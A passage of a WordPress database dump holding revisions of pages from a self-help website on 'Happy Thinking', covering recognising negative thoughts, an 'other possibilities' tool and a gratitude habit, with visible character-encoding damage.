(1724, 1, '2023-06-05 12:25:45', '2023-06-05 12:25:45', '<!-- wp:paragraph -->\n<p>First of all, I warmly welcome you to this website where I will tell you about â€œHappy Thinkingâ€. The information I will present to you has certainly made me become a happier person and I am pleased to be able to share it with you so that you can benefit from it as well.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>Let us begin with the question, â€œWhat do we actually mean when we say that a person is happy?â€ The answer to this basic question is not that straightforward. Despite the fact that all of us want to be happy, the concept of being â€œhappyâ€ is something that is quite difficult to define. This is because, â€œto be happyâ€ means different things to different people. I consider myself to be happy, when I am able to cope, without being stressed or depressed, with the various challenges that the world throws at me. Most of us desire to have a relatively easy life with little or no problems, but of course, the reality is that hardships and problems are part of everyone''s life. In the face of such challenges, if one is able to think in ways that are â€œhelpfulâ€ in dealing with those challenges and lets one remain calm and content, I would consider that person to be happy. This is of course not a perfect definition, but nevertheless is probably a good one to start with.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>A very important determinant of how happy one is, lies in the way oneâ€™s mind â€œthinksâ€. For example, imagine that two people, holding very good jobs, have been suddenly told that their company no longer needs them and that they will have to leave immediately. Both these people are now in an unfortunate situation where they will lose their generous salaries and perks.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>One of these people might think, â€œWell that was a great job, but that is no more. No point thinking of what I have lost, instead, I need to start job hunting as soon as possible so I can pay my household bills.â€</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>On the other hand, the other person might think, â€œHow terrible! Bad things only happen to me. I will never get another job. There is no point trying as the world is useless.â€</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>In this example, you can see that both people had to face the same problem, but each had a markedly different way of â€œthinkingâ€ when dealing with the problem.&nbsp;</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>The first person had ways of thinking that were â€œhelpfulâ€ as they did not make the personâ€™s sadness worse. Rather, this person''s helpful ways of thinking kept his or her mind in a state where it could effectively think about potential solutions. This personâ€™s positive outlook will help the person to move on and ultimately find a replacement job.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>On the other hand, the second personâ€™s thinking was â€œnegativeâ€ and made a bad situation worse. This person may well spiral into depression, which itself may make finding another job difficult.Â </p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>My ultimate aim in this website about happy thinking is to help you to recognise negative thinking when it occurs in your mind and to give you mental techniques to effectively deal with such thinking. I have divided this website about Happy Thinking into two main parts:</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>In the first part, I will describe to you, in an easy to understand way, common types of negative thinking. This will help you to recognise such thinking when it happens in your mind.Â Â </p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>In the second part, I will describe various special techniques that your mind can use to either change negative thinking or help prevent such thinking from affecting you in a negative way. I like to think of such techniques, as â€œtoolsâ€, and just like a repairman will use various tools to repair something, you will be able to use these tools to deal with unhelpful thinking. These â€œtoolsâ€ are very practical so that you will be able to use them in your daily life.Â </p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>In between describing negative thinking and giving you tools to deal with such thinking, I will also sprinkle bits of wisdom about happiness that I have gathered from various places. Such wisdom may help you to see the world in a more accepting and positive way.Â </p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>So in essence, â€˜happy thinkingâ€ is about you recognising negative thinking when it occurs in your mind and then using one or more tools to deal with such thinking. This along with a sprinkling of wisdom, should make you a happy person! I truly believe that you will enjoy and benefit from â€œHappy Thinkingâ€.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:buttons {"layout":{"type":"flex","justifyContent":"center","orientation":"horizontal"}} -->\n<div class="wp-block-buttons"><!-- wp:button {"textAlign":"center","style":{"border":{"radius":"15px"}},"className":"is-style-fill"} -->\n<div class="wp-block-button is-style-fill"><a class="wp-block-button__link has-text-align-center wp-element-button" href="https://www.happythinking.com" style="border-radius:15px">Prev</a></div>\n<!-- /wp:button -->\n\n<!-- wp:button {"textAlign":"center","style":{"border":{"radius":"15px"}},"className":"is-style-fill"} -->\n<div class="wp-block-button is-style-fill"><a class="wp-block-button__link has-text-align-center wp-element-button" href="https://www.happythinking.com/unhelpful_thinking_patterns/" style="border-radius:15px">Next</a></div>\n<!-- /wp:button --></div>\n<!-- /wp:buttons -->\n\n<!-- wp:spacer {"height":"20px"} -->\n<div style="height:20px" aria-hidden="true" class="wp-block-spacer"></div>\n<!-- /wp:spacer -->\n\n<!-- wp:buttons {"align":"wide","layout":{"type":"flex","justifyContent":"center"}} -->\n<div class="wp-block-buttons alignwide"><!-- wp:button {"textAlign":"center","style":{"border":{"radius":"15px"}}} -->\n<div class="wp-block-button"><a class="wp-block-button__link has-text-align-center wp-element-button" href="https://www.happythinking.com/" style="border-radius:15px">Home</a></div>\n<!-- /wp:button --></div>\n<!-- /wp:buttons -->\n\n<!-- wp:spacer {"height":"30px"} -->\n<div style="height:30px" aria-hidden="true" class="wp-block-spacer"></div>\n<!-- /wp:spacer -->', 'Introduction', '', 'inherit', 'closed', 'closed', '', '1034-revision-v1', '', '', '2023-06-05 12:25:45', '2023-06-05 12:25:45', '', 1034, 'https://www.happythinking.com/?p=1724', 0, 'revision', '', 0);
INSERT INTO `wpou_posts` VALUES
(1725, 1, '2023-06-05 12:28:24', '2023-06-05 12:28:24', '<!-- wp:paragraph -->\n<p>First of all, I warmly welcome you to this website where I will tell you about â€œHappy Thinkingâ€. The information I will present to you has certainly made me become a happier person and I am pleased to be able to share it with you so that you can benefit from it as well.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>Let us begin with the question, â€œWhat do we actually mean when we say that a person is happy?â€ The answer to this basic question is not that straightforward. Despite the fact that all of us want to be happy, the concept of being â€œhappyâ€ is something that is quite difficult to define. This is because, â€œto be happyâ€ means different things to different people. I consider myself to be happy, when I am able to cope, without being stressed or depressed, with the various challenges that the world throws at me. Most of us desire to have a relatively easy life with little or no problems, but of course, the reality is that hardships and problems are part of everyone''s life. In the face of such challenges, if one is able to think in ways that are â€œhelpfulâ€ in dealing with those challenges and lets one remain calm and content, I would consider that person to be happy. This is of course not a perfect definition, but nevertheless is probably a good one to start with.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>A very important determinant of how happy one is, lies in the way oneâ€™s mind â€œthinksâ€. For example, imagine that two people, holding very good jobs, have been suddenly told that their company no longer needs them and that they will have to leave immediately. Both these people are now in an unfortunate situation where they will lose their generous salaries and perks.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>One of these people might think, â€œWell that was a great job, but that is no more. No point thinking of what I have lost, instead, I need to start job hunting as soon as possible so I can pay my household bills.â€</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>On the other hand, the other person might think, â€œHow terrible! Bad things only happen to me. I will never get another job. There is no point trying as the world is useless.â€</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>In this example, you can see that both people had to face the same problem, but each had a markedly different way of â€œthinkingâ€ when dealing with the problem.&nbsp;</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>The first person had ways of thinking that were â€œhelpfulâ€ as they did not make the personâ€™s sadness worse. Rather, this person''s helpful ways of thinking kept his or her mind in a state where it could effectively think about potential solutions. This personâ€™s positive outlook will help the person to move on and ultimately find a replacement job.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>On the other hand, the second personâ€™s thinking was â€œunhelpfulâ€ and made a bad situation worse. This person may well spiral into depression, which itself may make finding another job difficult.&nbsp;</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>My ultimate aim in this website about happy thinking is to help you to recognise unhelpful thinking when it occurs in your mind and to give you mental techniques to effectively deal with such thinking. I have divided this website about Happy Thinking into two main parts:</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>In the first part, I will describe to you, in an easy to understand way, common types of unhelpful thinking. This will help you to recognise such thinking when it happens in your mind.&nbsp;&nbsp;</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>In the second part, I will describe various special techniques that your mind can use to either change unhelpful thinking or help prevent such thinking from affecting you in a negative way. I like to think of such techniques, as â€œtoolsâ€, and just like a repairman will use various tools to repair something, you will be able to use these tools to deal with unhelpful thinking. These â€œtoolsâ€ are very practical so that you will be able to use them in your daily life.&nbsp;</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>In between describing unhelpful thinking and giving you tools to deal with such thinking, I will also sprinkle bits of wisdom about happiness that I have gathered from various places. Such wisdom may help you to see the world in a more accepting and positive way.&nbsp;</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>So in essence, â€˜happy thinkingâ€ is about you recognising unhelpful thinking when it occurs in your mind and then using one or more tools to deal with such thinking. This along with a sprinkling of wisdom, should make you a happy person! I truly believe that you will enjoy and benefit from â€œHappy Thinkingâ€.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:buttons {"layout":{"type":"flex","justifyContent":"center","orientation":"horizontal"}} -->\n<div class="wp-block-buttons"><!-- wp:button {"textAlign":"center","style":{"border":{"radius":"15px"}},"className":"is-style-fill"} -->\n<div class="wp-block-button is-style-fill"><a class="wp-block-button__link has-text-align-center wp-element-button" href="https://www.happythinking.com" style="border-radius:15px">Prev</a></div>\n<!-- /wp:button -->\n\n<!-- wp:button {"textAlign":"center","style":{"border":{"radius":"15px"}},"className":"is-style-fill"} -->\n<div class="wp-block-button is-style-fill"><a class="wp-block-button__link has-text-align-center wp-element-button" href="https://www.happythinking.com/unhelpful_thinking_patterns/" style="border-radius:15px">Next</a></div>\n<!-- /wp:button --></div>\n<!-- /wp:buttons -->\n\n<!-- wp:spacer {"height":"20px"} -->\n<div style="height:20px" aria-hidden="true" class="wp-block-spacer"></div>\n<!-- /wp:spacer -->\n\n<!-- wp:buttons {"align":"wide","layout":{"type":"flex","justifyContent":"center"}} -->\n<div class="wp-block-buttons alignwide"><!-- wp:button {"textAlign":"center","style":{"border":{"radius":"15px"}}} -->\n<div class="wp-block-button"><a class="wp-block-button__link has-text-align-center wp-element-button" href="https://www.happythinking.com/" style="border-radius:15px">Home</a></div>\n<!-- /wp:button --></div>\n<!-- /wp:buttons -->\n\n<!-- wp:spacer {"height":"30px"} -->\n<div style="height:30px" aria-hidden="true" class="wp-block-spacer"></div>\n<!-- /wp:spacer -->', 'Introduction', '', 'inherit', 'closed', 'closed', '', '1034-revision-v1', '', '', '2023-06-05 12:28:24', '2023-06-05 12:28:24', '', 1034, 'https://www.happythinking.com/?p=1725', 0, 'revision', '', 0),
(1949, 1, '2023-06-21 17:26:07', '2023-06-21 17:26:07', '<!-- wp:paragraph -->\n<p>As you know, negative thinking patterns are about seeing things in a way that does not represent reality. The â€œreality checkâ€ tool that we discussed before works by one not finding evidence to back up negative thoughts. Here, I will describe another approach you can take, which is by using what I call the â€œother possibilitiesâ€ tool. This would be best understood with the use of an example.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>Let us imagine that Sally and her good friend Rupa are working in an office. One day, as Sally and Rupa see each other for the first time in the morning, Rupa doesnâ€™t smile and even appears to ignore Sally. Sally immediately jumps to the conclusion, â€œRupa must be angry with me.â€ For the rest of the morning, Sally is in a distressed state, trying to work out why Rupa must be angry with her. This goes on till lunchtime when Sally sees Rupa again. This time, Rupa smiles broadly and says, â€œThis morning was so stressful. My boss had wanted me to do some calculations for him, and I had worked on it all weekend on my laptop. Yet this morning, the document with all the calculations seemed to have gone missing from my laptop and I was so terrified about going to the meeting. Luckily, at the meeting, there was this guy who is really good with computers and he somehow located the missing document, and whew, everything was fine after that!â€&nbsp;</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>As you can see, in this example, Sally had unnecessarily suffered a whole morning because of the negative thought, â€œRupa must be angry with meâ€, which did not match the reality of the situation. Let us now imagine a different direction this scenario could have taken. Let us start with Sally having the thought, â€œRupa must be angry with me.â€ Sally then says â€œpauseâ€ to herself to still the thought. At this point, she asks herself, â€œWhat other possibilities are there for Rupa not smiling at me?â€. Asking this question forces Sally to think of other possibilities and she thinks to herself, â€œMaybe Rupa is suffering from migraine like she sometimes does, or maybe she is stressed about some work issue or maybe she had a tiring morning coming to work.â€ This â€œthinking of other possibilitiesâ€ makes Sally realise that the original thought that she had is not the only possible thought. In other words, there is a good chance that the thought, â€œRupa is angry with me, may not even be correct, as there are other thoughts that also could be correct.â€ In this way, the â€œother possibilitiesâ€ tool can reduce the â€œpowerâ€ of the original negative thought. As Sally decides to ignore the negative thought and move on to doing her office tasks, it will soon fade away.&nbsp;</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>As the above example shows, by finding other possible thoughts, one can see things in a more â€œbalancedâ€ way, instead of focusing oneâ€™s attention only on one fixed and potentially inaccurate thought.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:buttons {"layout":{"type":"flex","justifyContent":"center","orientation":"horizontal"}} -->\n<div class="wp-block-buttons"><!-- wp:button {"textAlign":"center","style":{"border":{"radius":"15px"}},"className":"is-style-fill"} -->\n<div class="wp-block-button is-style-fill"><a class="wp-block-button__link has-text-align-center wp-element-button" href="https://www.happythinking.com/ignore-move-on/" style="border-radius:15px">Prev</a></div>\n<!-- /wp:button -->\n\n<!-- wp:button {"textAlign":"center","style":{"border":{"radius":"15px"}},"className":"is-style-fill"} -->\n<div class="wp-block-button is-style-fill"><a class="wp-block-button__link has-text-align-center wp-element-button" href="https://www.happythinking.com/gratitude/" style="border-radius:15px">Next</a></div>\n<!-- /wp:button --></div>\n<!-- /wp:buttons -->\n\n<!-- wp:spacer {"height":"20px"} -->\n<div style="height:20px" aria-hidden="true" class="wp-block-spacer"></div>\n<!-- /wp:spacer -->\n\n<!-- wp:buttons {"align":"wide","layout":{"type":"flex","justifyContent":"center"}} -->\n<div class="wp-block-buttons alignwide"><!-- wp:button {"textAlign":"center","style":{"border":{"radius":"15px"}}} -->\n<div class="wp-block-button"><a class="wp-block-button__link has-text-align-center wp-element-button" href="https://www.happythinking.com/" style="border-radius:15px">Home</a></div>\n<!-- /wp:button --></div>\n<!-- /wp:buttons -->\n\n<!-- wp:spacer {"height":"30px"} -->\n<div style="height:30px" aria-hidden="true" class="wp-block-spacer"></div>\n<!-- /wp:spacer -->', 'â€œOther possibilitiesâ€ tool', '', 'inherit', 'closed', 'closed', '', '1661-revision-v1', '', '', '2023-06-21 17:26:07', '2023-06-21 17:26:07', '', 1661, 'https://www.happythinking.com/?p=1949', 0, 'revision', '', 0),
(1950, 1, '2023-06-21 17:27:13', '2023-06-21 17:27:13', '<!-- wp:paragraph -->\n<p>There is a very simple tool that can be used to help one to be happy, and that is the act of being â€œgratefulâ€. Studies have shown that being thankful (i.e. gratitude) helps to improve oneâ€™s mental health. The gratitude tool is about developing a habit of being grateful.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>Often, especially when things are not great, it is easy to think that there is nothing to be grateful for. Perhaps this is because our minds tend to ignore positive aspects of our lives and instead, focus only on negatives. When one looks for things to be grateful for, one should not only focus on â€œbigâ€ things. While of course, one should not ignore big things, it is also important to actively look for â€œsmallâ€ things as well. Let me give you an example. Imagine that a person, who we will call Mark, has severe arthritis that limits his mobility and makes it difficult for him to venture out of his house. However, on this day, he does manage to go for a short walk up and down the street he lives in. That evening, as part of the â€œgratitude toolâ€ that he uses every day, Mark thinks of things to be grateful for. He tells himself, â€œToday I am grateful that I was able to walk up and down my street and was able to enjoy the outdoors a little bit. Another thing that I am grateful for is the phone call that my friend Sam made to me. It was great chatting with him and it made me feel better.â€</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>As you may have noticed in the example, the things that one can be grateful for don''t have to be major. Just a few everyday things can work as well. Initially, one may need to spend some extra effort looking for things to be grateful for, as oneâ€™s mind may have gotten used to ignoring such things. One could even choose very simple things like being grateful for the person smiling at you at the supermarket.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>When using the gratitude tool, try to be a bit creative. One doesnâ€™t have to always choose the same things every day, such as, â€œI am grateful for my loving family.â€ If one keeps saying the same things every day (e.g. loving family), then oneâ€™s mind may not â€œlearnâ€ how to look for things to be grateful for. One can instead, try to look for different small things every day to be grateful for.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>However, when looking for things to be grateful for, there are a few things you need to be careful about. One should not excessively focus on being grateful to people who one may feel under obligation to, either emotionally or materially (e.g. someone who has lent one money). I am not saying that one should not acknowledge such persons. But excessively doing so may bring oneâ€™s mood down, as one may feel constantly indebted to those people and develop a sense of being helpless. It''s also important to not let the gratitude tool be about being happy about others'' misfortunes. (e.g. â€œAt least I am not as poor as my neighbour, Mary.â€). That would make the gratitude tool a negative exercise. Rather, one should just be grateful for good things that have happened to oneself without comparing them to those less fortunate than oneself.&nbsp;</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>When using the gratitude tool, most people will use their â€œinner voiceâ€ to express their gratitude. However, some might find it useful to write these thoughts in a notebook or diary (â€œgratitude journalâ€). At times, one might even be able to directly express gratitude to someone (e.g. â€œThank you for visiting me, you made me feel better.â€)</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>Remembering to be grateful can be a challenge and one may need to develop a way of reminding oneself to be grateful. Perhaps, for example, one can put a daily reminder on oneâ€™s phone diary, to remind oneself every day, at a convenient time, to be grateful, perhaps with a screen message, â€œGrateful Tool time!â€. Another approach can be to just make it a habit at an easy-to-remember time of the day, such as when getting into bed in the evening.&nbsp;</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>As one regularly uses the gratitude tool, one will find that oneâ€™s mind will look at the world in a less negative manner.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>By the way, I am very grateful that you are visiting this website! I feel thankful that I have the opportunity to share my thoughts with you.&nbsp;</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:buttons {"layout":{"type":"flex","justifyContent":"center","orientation":"horizontal"}} -->\n<div class="wp-block-buttons"><!-- wp:button {"textAlign":"center","style":{"border":{"radius":"15px"}},"className":"is-style-fill"} -->\n<div class="wp-block-button is-style-fill"><a class="wp-block-button__link has-text-align-center wp-element-button" href="https://www.happythinking.com/other-possibilities/" style="border-radius:15px">Prev</a></div>\n<!-- /wp:button -->\n\n<!-- wp:button {"textAlign":"center","style":{"border":{"radius":"15px"}},"className":"is-style-fill"} -->\n<div class="wp-block-button is-style-fill"><a class="wp-block-button__link has-text-align-center wp-element-button" href="https://www.happythinking.com/conclusion/" style="border-radius:15px">Next</a></div>\n<!-- /wp:button --></div>\n<!-- /wp:buttons -->\n\n<!-- wp:spacer {"height":"20px"} -->\n<div style="height:20px" aria-hidden="true" class="wp-block-spacer"></div>\n<!-- /wp:spacer -->\n\n<!-- wp:buttons {"align":"wide","layout":{"type":"flex","justifyContent":"center"}} -->\n<div class="wp-block-buttons alignwide"><!-- wp:button {"textAlign":"center","style":{"border":{"radius":"15px"}}} -->\n<div class="wp-block-button"><a class="wp-block-button__link has-text-align-center wp-element-button" href="https://www.happythinking.com/" style="border-radius:15px">Home</a></div>\n<!-- /wp:button --></div>\n<!-- /wp:buttons -->\n\n<!-- wp:spacer {"height":"30px"} -->\n<div style="height:30px" aria-hidden="true" class="wp-block-spacer"></div>\n<!-- /wp:spacer -->', 'Gratitude tool', '', 'inherit', 'closed', 'closed', '', '1664-revision-v1', '', '', '2023-06-21 17:27:13', '2023-06-21 17:27:13', '', 1664, 'https://www.happythinking.com/?p=1950', 0, 'revision', '', 0),
(1727, 1, '2023-06-06 08:10:07', '2023-06-06 08:10:07', '<!-- wp:heading -->\n<h2>Thank you very much !</h2>\n<!-- /wp:heading -->\n\n<!-- wp:paragraph -->\n<p><span style="font-size: 14px;">I really appreciate your help. Your kind contribustion will defintely help me maintain and add new material to this website. Thank you.</span></p>\n<!-- /wp:paragraph -->', 'A big thank you !', '', 'inherit', 'closed', 'closed', '', '510-revision-v1', '', '', '2023-06-06 08:10:07', '2023-06-06 08:10:07', '', 510, 'https://www.happythinking.com/?p=1727', 0, 'revision', '', 0),
(1730, 1, '2023-06-06 08:16:56', '2023-06-06 08:16:56', '<!-- wp:paragraph -->\n<p>First of all, I warmly welcome you to this website where I will tell you about â€œHappy Thinkingâ€. The information I will present to you has certainly made me become a happier person and I am pleased to be able to share it with you so that you can benefit from it as well.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>Let us begin with the question, â€œWhat do we actually mean when we say that a person is happy?â€ The answer to this basic question is not that straightforward. Despite the fact that all of us want to be happy, the concept of being â€œhappyâ€ is something that is quite difficult to define. This is because, â€œto be happyâ€ means different things to different people. I consider myself to be happy, when I am able to cope, without being stressed or depressed, with the various challenges that the world throws at me. Most of us desire to have a relatively easy life with little or no problems, but of course, the reality is that hardships and problems are part of everyone''s life. In the face of such challenges, if one is able to think in ways that are â€œhelpfulâ€ in dealing with those challenges and lets one remain calm and content, I would consider that person to be happy. This is of course not a perfect definition, but nevertheless is probably a good one to start with.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>A very important determinant of how happy one is, lies in the way oneâ€™s mind â€œthinksâ€. For example, imagine that two people, holding very good jobs, have been suddenly told that their company no longer needs them and that they will have to leave immediately. Both these people are now in an unfortunate situation where they will lose their generous salaries and perks.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>One of these people might think, â€œWell that was a great job, but that is no more. No point thinking of what I have lost, instead, I need to start job hunting as soon as possible so I can pay my household bills.â€</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>On the other hand, the other person might think, â€œHow terrible! Bad things only happen to me. I will never get another job. There is no point trying as the world is useless.â€</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>In this example, you can see that both people had to face the same problem, but each had a markedly different way of â€œthinkingâ€ when dealing with the problem.&nbsp;</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>The first person had ways of thinking that were â€œhelpfulâ€ as they did not make the personâ€™s sadness worse. Rather, this person''s helpful ways of thinking kept his or her mind in a state where it could effectively think about potential solutions. This personâ€™s positive outlook will help the person to move on and ultimately find a replacement job.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>On the other hand, the second personâ€™s thinking was â€œunhelpfulâ€ and made a bad situation worse. This person may well spiral into depression, which itself may make finding another job difficult.&nbsp;</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>My ultimate aim in this website about happy thinking is to help you to recognise unhelpful thinking when it occurs in your mind and to give you mental techniques to effectively deal with such thinking. I have divided this website about Happy Thinking into two main parts:</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>In the first part, I will describe to you, in an easy to understand way, common types of unhelpful thinking. This will help you to recognise such thinking when it happens in your mind.&nbsp;&nbsp;</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>In the second part, I will describe various special techniques that your mind can use to either change unhelpful thinking or help prevent such thinking from affecting you in a negative way. I like to think of such techniques, as â€œtoolsâ€, and just like a repairman will use various tools to repair something, you will be able to use these tools to deal with unhelpful thinking. These â€œtoolsâ€ are very practical so that you will be able to use them in your daily life.&nbsp;</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>In between describing unhelpful thinking and giving you tools to deal with such thinking, I will also sprinkle bits of wisdom about happiness that I have gathered from various places. Such wisdom may help you to see the world in a more accepting and positive way.&nbsp;</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>So in essence, â€˜happy thinkingâ€ is about you recognising unhelpful thinking when it occurs in your mind and then using one or more tools to deal with such thinking. This along with a sprinkling of wisdom, should make you a happy person! I truly believe that you will enjoy and benefit from â€œHappy Thinkingâ€.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:buttons {"layout":{"type":"flex","justifyContent":"center","orientation":"horizontal"}} -->\n<div class="wp-block-buttons"><!-- wp:button {"textAlign":"center","style":{"border":{"radius":"15px"}},"className":"is-style-fill"} -->\n<div class="wp-block-button is-style-fill"><a class="wp-block-button__link has-text-align-center wp-element-button" href="https://www.happythinking.com" style="border-radius:15px">Prev</a></div>\n<!-- /wp:button -->\n\n<!-- wp:button {"textAlign":"center","style":{"border":{"radius":"15px"}},"className":"is-style-fill"} -->\n<div class="wp-block-button is-style-fill"><a class="wp-block-button__link has-text-align-center wp-element-button" href="https://www.happythinking.com/unhelpful-thinking-patterns/" style="border-radius:15px">Next</a></div>\n<!-- /wp:button --></div>\n<!-- /wp:buttons -->\n\n<!-- wp:spacer {"height":"20px"} -->\n<div style="height:20px" aria-hidden="true" class="wp-block-spacer"></div>\n<!-- /wp:spacer -->\n\n<!-- wp:buttons {"align":"wide","layout":{"type":"flex","justifyContent":"center"}} -->\n<div class="wp-block-buttons alignwide"><!-- wp:button {"textAlign":"center","style":{"border":{"radius":"15px"}}} -->\n<div class="wp-block-button"><a class="wp-block-button__link has-text-align-center wp-element-button" href="https://www.happythinking.com/" style="border-radius:15px">Home</a></div>\n<!-- /wp:button --></div>\n<!-- /wp:buttons -->\n\n<!-- wp:spacer {"height":"30px"} -->\n<div style="height:30px" aria-hidden="true" class="wp-block-spacer"></div>\n<!-- /wp:spacer -->', 'Introduction', '', 'inherit', 'closed', 'closed', '', '1034-revision-v1', '', '', '2023-06-06 08:16:56', '2023-06-06 08:16:56', '', 1034, 'https://www.happythinking.com/?p=1730', 0, 'revision', '', 0),
(1728, 1, '2023-06-06 08:13:41', '2023-06-06 08:13:41', '<!-- wp:heading -->\n<h2>Payment failed ooops</h2>\n<!-- /wp:heading -->\n\n<!-- wp:paragraph -->\n<p><span style="font-size: 14px;">I am just an ordinary guy trying to do my bit to improve the world !</span></p>\n<!-- /wp:paragraph -->', 'Payment Failed', '', 'inherit', 'closed', 'closed', '', '511-revision-v1', '', '', '2023-06-06 08:13:41', '2023-06-06 08:13:41', '', 511, 'https://www.happythinking.com/?p=1728', 0, 'revision', '', 0),
(1853, 1, '2023-06-16 19:15:28', '2023-06-16 19:15:28', '<!-- wp:paragraph -->\n<p>First of all, welcome to this website where I will tell you about â€œHappy Thinkingâ€. The information I will present to you has certainly made me a happier person and I am very pleased to share it with you so that you can benefit from it as well.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>We all desire to be happy. Unfortunately, the world we live in is full of stress and challenges, and a lot of these we are not able to get rid of, at least in the short term. In other words, we need to be able to be as happy as we can, despite the various challenges around us.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:image {"align":"center","id":1782,"sizeSlug":"full","linkDestination":"none"} -->\n<figure class="wp-block-image aligncenter size-full"><img src="https://www.happythinking.com/wp-content/uploads/yellowunhappy_100623.jpg" alt="" class="wp-image-1782"/></figure>\n<!-- /wp:image -->\n\n<!-- wp:paragraph -->\n<p>While we may not be able to always control the things happening around us, one thing we can control is how our minds â€œthinkâ€. Happiness is created by thoughts, so thinking in positive and useful ways can promote happiness in us. On the other hand, thinking in negative and useless ways can push us into unhappiness. The â€œway we thinkâ€ is an immensely powerful determinant of our happiness.&nbsp;</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>For example, imagine that two people, holding very good jobs, have been suddenly told that their company no longer needs them and that they will have to leave immediately. Both these people are now in an unfortunate situation where they will lose their generous salaries and perks.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>One of these people might think, â€œWell that was a great job, but that is no more. No point thinking of what I have lost, instead, I need to start job hunting as soon as possible so I can pay my household bills.â€</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>On the other hand, the other person might think, â€œHow terrible! Bad things only happen to me. I will never get another job. There is no point trying as the world is useless.â€</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>In this example, you can see that both people had to face the same problem, but each had a markedly different way of â€œthinkingâ€ when dealing with the problem.&nbsp;</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>The first person had ways of thinking that were positive as they did not make the personâ€™s sadness worse. Rather, this personâ€™s helpful ways of thinking kept his or her mind in a state where it could effectively think about potential solutions. This personâ€™s positive outlook will help the person to move on and ultimately find a replacement job.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>On the other hand, the second personâ€™s thinking was negative and made a bad situation worse. This person may well spiral into depression, which itself may make finding another job difficult.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:image {"align":"center","id":1842,"sizeSlug":"full","linkDestination":"none"} -->\n<figure class="wp-block-image aligncenter size-full"><img src="https://www.happythinking.com/wp-content/uploads/drowning_160623.jpg" alt="" class="wp-image-1842"/></figure>\n<!-- /wp:image -->\n\n<!-- wp:paragraph -->\n<p>â€œHappy Thinkingâ€ is about changing oneâ€™s negative thinking so that one can, despite the challenges around oneself, be in a state of happiness. To help one to achieve this in a logical manner, I have divided this website about Happy Thinking into two main parts.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>In the first part, I will describe, in an easy-to-understand way, common negative thinking that people do. This will help one to recognise such thinking when it happens in oneâ€™s mind. An important aspect of changing negative thinking is to be able to recognise such thinking. After all, how can one change something that one does not see? For this reason, the first part of the website will purely focus on describing negative thinking, without explaining how you can change 